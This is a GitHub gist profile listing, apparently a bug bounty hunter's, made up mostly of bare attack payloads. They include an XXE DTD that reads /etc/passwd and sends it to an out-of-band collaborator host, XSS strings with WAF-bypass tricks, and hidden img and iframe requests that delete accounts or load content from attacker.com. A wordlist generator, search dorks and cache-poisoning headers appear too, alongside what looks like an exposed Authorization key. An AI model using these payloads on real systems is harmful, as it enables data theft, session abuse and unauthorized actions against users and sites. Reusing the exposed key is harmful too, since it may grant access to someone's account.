Skip to content

Instantly share code, notes, and snippets.

View ratnadip1998's full-sized avatar

ratnadip1998

6 followers · 15 following
View GitHub Profile
@ratnadip1998
ratnadip1998 / exfil.dtd
Created October 3, 2025 09:54
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://%file%.h6ojcmzsjqtnjvjyv6als7vbl2rtfp3e.oastify.com/'>">
%eval;
@ratnadip1998
ratnadip1998 / t
Created August 18, 2025 15:32
##Rare Cases
*/</script><script>alert()/*
'href=javascript:alert()>click me<a/y='
"autofocus onclick=’&#97;lert()'
Akamai Tricks & Tips
* alert() => window['alert']()
* alert() => this['alert']()
* alert() => (alert)()
* alert() => eval(atob('YWxlcnQoKQ=='))
@ratnadip1998
ratnadip1998 / gt
Last active August 4, 2025 15:18
{
__type(name: "TableauUser") {
name
kind
fields {
name
type {
name
kind
ofType {
@ratnadip1998
ratnadip1998 / xsssss
Last active July 1, 2025 21:11
https://example.com/page?path=<img src="/[email protected]">
https://example.com/page?path=<iframe src="/delete-account?confirm=true" style="display:none;">
fetch('/action?param=value', { credentials: 'include' });
@ratnadip1998
ratnadip1998 / tes
Last active June 6, 2025 08:48
<img src="javascript:fetch('//attacker.com/test.html').then(r=>r.text()).then(t=>document.body.innerHTML=t)">
<img src=x style="content:url('http://attacker.com/test.html')">
@ratnadip1998
ratnadip1998 / Survey
Last active June 26, 2025 10:28
https://docs.google.com/forms/d/1gvftw9m8pnl7NlyVArfTS2kLISoYsG29sYtZy7HmRbs/edit
https://docs.google.com/forms/d/1AlTAcrpvLAklwP2yfONZmqcE0AO8DbwQ8KSvl-O5ktA/edit
https://docs.google.com/forms/d/1gIP_e54wvGBDBLH7C3fCVICWbRH_K0H5mKlgtNQOQVU/edit
https://docs.google.com/forms/d/1Qcqnvdy2sfd5xBa1loTrFN1SRnBIa_oMmQnWuzoWTNQ/edit
https://docs.google.com/forms/d/16gC6TfSJCxJTjHEjvvVsD2H3fogPwW9Gr8rKx0ljt9A/edit
@ratnadip1998
ratnadip1998 / gist:6d8886a414a4c6664f8936ad95e993a6
Created February 5, 2025 17:25
ray
#!python2
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from burp import IBurpExtender, ITab
from burp import IContextMenuFactory
# from java.awt import Color
from javax.swing import JMenuItem
from javax.swing import JPanel
from javax.swing import JLabel,JTextField,JButton
@ratnadip1998
ratnadip1998 / pass
Created August 6, 2024 06:52
import itertools
import random
special_chars = "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
words = ["example", "password", "security", "test", "random"]
years = [str(year) for year in range(2000, 2031)]
with open("wordlist.txt", "w") as f:
for _ in range(1000): # Change 1000 to however many combinations you want
specials = ''.join(random.choices(special_chars, k=4))
@ratnadip1998
ratnadip1998 / bb
Last active June 30, 2024 15:48
https://stragwxnwe01.ah.nl/
https://golden.com/home
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
@ratnadip1998
ratnadip1998 / cache.txt
Last active February 24, 2023 12:33
x-forwarded-scheme
x-forwarded-host
\
Authorization: SharedKeyLite myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
x-forwarded-Proto
x-http-method-override
x-amz-website-redirect-location
X-host
X-Forwarded-Host
X-Forwarded-Server